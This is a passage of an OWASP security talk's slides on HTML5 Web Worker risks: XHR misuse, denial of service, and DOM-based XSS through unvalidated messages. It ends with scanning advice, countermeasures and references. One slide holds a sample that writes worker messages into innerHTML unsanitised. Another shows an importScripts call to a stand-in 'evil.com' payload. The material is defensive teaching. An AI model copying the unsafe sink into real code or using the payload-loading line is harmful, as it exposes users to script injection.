  • 65. Web Worker – Hacks! Web Workers allows threading into HTML pages using JavaScript No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); OWASP 65
  • 66. Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
  • 67. Web Worker – Hacks! Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
  • 68. Web Worker – Hacks!  Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> OWASP 68
  • 69. Web Workers – Hacks! Possible to cause XSS Running script Passing hidden payload Also, web workers can help in embedding silent running js file and can be controlled. Can be a tool for payload delivery and control within browser framework importScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
  • 70. Scan and Defend Scan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc. Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
  • 71. APIs … HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
  • 72. Resources/References http://www.html5rocks.com/en/ (Solid stuff) https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff) http://html5sec.org/ (Quick Cheat sheet) http://html5security.org/ (Good resources) http://blog.kotowicz.net/ (Interesting work) OWASP 72
  • 73. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 73